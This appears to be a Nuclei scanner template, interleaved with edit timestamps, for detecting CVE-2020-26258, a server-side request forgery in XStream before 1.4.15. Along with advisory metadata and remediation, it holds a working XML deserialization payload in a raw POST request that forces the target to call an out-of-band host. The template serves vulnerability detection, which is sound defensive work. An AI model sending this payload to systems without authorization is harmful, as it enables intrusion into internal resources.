2023-03-12 03:38:05 +00:00
id : CVE-2020-26258
info :
2023-04-12 18:50:27 +00:00
name : XStream <1.4.15 - Server-Side Request Forgery
2023-03-12 03:38:05 +00:00
author : pwnhxl
severity : high
2023-03-23 11:21:46 +00:00
description : |
2023-04-12 18:50:27 +00:00
XStream before 1.4.15 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
2023-09-06 12:22:36 +00:00
remediation : Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher.
2023-03-12 03:38:05 +00:00
reference :
- https://x-stream.github.io/CVE-2020-26258.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258
2023-03-29 20:18:04 +00:00
- https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28
2023-04-12 18:50:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-26258
2023-07-11 19:49:27 +00:00
- https://lists.apache.org/thread.html/r97993e3d78e1f5389b7b172ba9f308440830ce5f051ee62714a0aa34@%3Ccommits.struts.apache.org%3E
2023-03-29 20:18:04 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score : 7.7
cve-id : CVE-2020-26258
cwe-id : CWE-918
2023-12-12 11:07:52 +00:00
epss-score : 0.85457
epss-percentile : 0.98234
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : xstream_project
product : xstream
2023-12-05 09:50:33 +00:00
tags : cve,cve2020,xstream,ssrf,oast,xstream_project
2023-03-12 03:38:05 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-12 03:38:05 +00:00
- raw :
- |
POST / HTTP/1.1
Host : {{Hostname}}
Content-Type : application/xml
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
<dataHandler>
<dataSource class='javax.activation.URLDataSource'>
<url>http://{{interactsh-url}}/internal/:</url>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<string>test</string>
</entry>
</map>
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
- "http"
2023-03-22 10:06:23 +00:00
- type : word
part : interactsh_request
words :
2023-03-29 18:40:01 +00:00
- "User-Agent: Java"
2023-12-12 12:02:03 +00:00
# digest: 4a0a0047304502200ea3b048952afd8720507f663a9a31ef81efb16e075878f2fe6c204476ac95df022100fd1c0749621f35fff11ce9fb362ccf30cf4c00839df7b76469b60e8f55ed2e43:922c64590222798bb761d5b6d8e72950